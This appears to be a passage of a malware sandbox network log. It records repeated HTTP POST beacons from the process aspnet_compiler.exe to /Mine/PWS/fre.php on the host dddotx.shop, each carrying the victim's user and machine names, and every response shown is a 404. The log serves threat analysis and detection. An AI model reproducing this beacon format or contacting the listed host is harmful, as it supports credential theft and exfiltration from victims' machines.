Sep 25, 2024 15:28:40.334278107 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:41.113013983 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p2U1p7eDkJlqOhs9qnm5NQxCRqFW4eqgljVSCen09hiZ402lhYuyjNq7sj3fnzuCS3V%2FKGdncc%2F%2FLrzcNQLQ0%2Fg8iNfxr0y5ooE6OoGdMVGvj8eaSiTGfxvDiCHAZg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5bd69aea42c9-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:41.267832994 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:41.272882938 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:41.990243912 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wioAlAEMbQkipN2MwG8GDiYOseoIotRJd0Rh5QNazVCbbud%2Bq%2B0V4NPdFSBqKbveITUNHwe9VVaLWA5AtV4s2u385MVh0LVIcbtj%2FfMIoXPLvJdcYKT8iA7fqJQ6nw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5bdc79374251-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:42.149990082 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:42.154915094 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:42.844978094 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rB9yGoVCx%2FkFD5TN42cUsXMt3ijaSYyGxXAoL6%2BsS37Dr9FDD3gKWRK6dMsTkqT3MwQDY%2F8fZPWB6tIH%2BhizLE%2FoJ4w63V3tXktH9plhQN5PoLzFWqpPAPn9BLpQuw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5be1fbe072bc-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:43.000952959 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:43.005872011 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:43.869628906 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FzvV0zOHIpTP8DVXxLHNBUwLlZGnKeDaMeZXwNEol0fsg3a8xlvRrw%2FHotoF5Vr6crbHMrEicSE4H4eZmSrLwEaJvw6cUo3Zt6EMzbvcynCP8Q1C3UqVDHP0GKAzrA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5be7699a8c29-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49738	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:44.019629002 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:44.024460077 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:44.707027912 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E67iXCs2O93RwzjD9kPT1AcB0DOQ7qfQCK1v3u5GnB0J1xm32C9yqFK1D9DmguKcoYTLhSWLqqIPiAoT9%2Fk29Vlex1UTJEcxKO8P62sDAYFfmFWJgfUnEq38%2FGTJCw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5beda9d041e6-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49739	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:44.860066891 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:44.864953041 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:45.626015902 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BuiDQ6Svr4d8lCW2K0zjebM%2B16WYG%2BtZHSk3vA4qVzAwlAOXinTcn73eB%2B2rHyEtnfGuD2AxwLQUIDlY6D0oRlkXeebiH9w05NfUR3%2FMG3J05o5IccC4ZDW8H3SRsw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5bf2fb4c729f-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49740	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:45.789467096 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:45.794466972 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:46.435095072 CEST	563	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DTBvAeC4uqz98Lew63Y7zLv76oS8zLQ%2BNDl2Zxw1p95UMsdCuQdyuUsUbjrWWHlIeybuGKhhJujbLOMfzrpyLpFWflk8M1ESM6MU6QGjwb0i4t68gTo5D02xcolcfw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5bf8aef9c337-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49741	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:46.581696033 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:46.586604118 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:47.271536112 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJWOZwsYYbnj3hvE7B8LS5yUqCwrjQUKohvihvS8QpacDM3jg%2FMlWqxw%2FeoKBYZtJF6NyRwIOvS3aXQ5mXUOGq52A6Uiis0nBKsdkxTMXD824PCp6gc9R6pkf0pNFg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5bfdb8da3320-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49743	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:47.454394102 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:47.459805965 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:48.160701036 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QE9YIl5d%2FC3im0M%2BQBTNxHQux7T2K4cmAJIDu80eMw8C67NnrYTi4FL1g9KIShbzTslME9FaygGpl%2F9s92Ma%2FtfZeEomgKIMDDX2oXuJyW0AnvWhgS5J%2Bk1HqIwndg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c033e370f37-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49745	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:48.324156046 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:48.329147100 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:49.039150953 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O1hR8UKxf2PX2BE0NhsdpdLx%2BA9jdawS8%2BstnwWk8b%2BPXQqdhAfldm7uYQFgZ4BxMDLkULk7tnX%2BtSYRys%2FPU2TyZ%2Fw8KfogyfP3PTRhVr5xQmIT7VtGGETyRahU4A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c089e267cf6-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49747	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:49.194071054 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:49.199141979 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:49.977329969 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jj8kaF9VMW7WOW%2BApWGzWucOFzNDg4tbbX0xC%2BtYy8v1QFoJKYYNRJ70Or%2FmNkt2LsbErSUwTYc%2BkXlHmEDUmK9KG6Pu0i%2B9LuA1Dy4B3OvdyVoNjPVgcGvCS4Oo9A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c0e08074319-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49749	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:50.183876991 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:50.188831091 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:50.951734066 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJJBJgDBK0AOSujO5ipOMwowYULtlw%2B9cUDNPwdeEnxoUw425C5Vt6duFTg8TTE%2FuvWRZ3Hw%2F9kQYMlIcv0VQKCDAjjr%2B6q21sVqwW%2BrwriA9wwCTESoel7FG7h%2BTQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c1429e94382-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	55890	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:51.097384930 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:51.102415085 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:51.830784082 CEST	579	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G%2FMVh8%2FzavsZ%2F%2B7Vjoi7eSByvQUb%2BHhllcuqWA%2FBCxd3nKqgJrFLx%2FXUb4oQRIEwAzqE5N0DLXEIxdSGORQIwHJ92TGcllCrhBrUTsnir%2Fm9w%2BnsgvQG3QUFhJrmkQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c1a0ba94388-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	55892	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:51.987924099 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:51.992772102 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:52.731527090 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qq5Cj405RHOFluwRyNentphqjmUqM3hbL344qXMXXrmxzdw%2BWMKHTE0599W2mdjHhLkeeIlSfn92wzcQKyHE5eZcjPUCPq8Xg%2FfTAvFP0oSZ0Fvn0Y4i3t8kfG64rw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c1f7c5e8c12-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	55893	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:52.876682997 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:52.881678104 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:53.549809933 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LJ2IOR4pOOmPP7cmYLyQt5VX%2BzHvj%2B5ECTDB5tYmomcLO0C10WLyS91Zpx%2FQzMLEIN8sAcGGXueHZNk87lexHcqS8d5zusB%2Bg4dipv4tdfdexbVO1uwjJbIZLiOXwA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c24fedc1986-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	55894	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:53.721658945 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:53.727655888 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
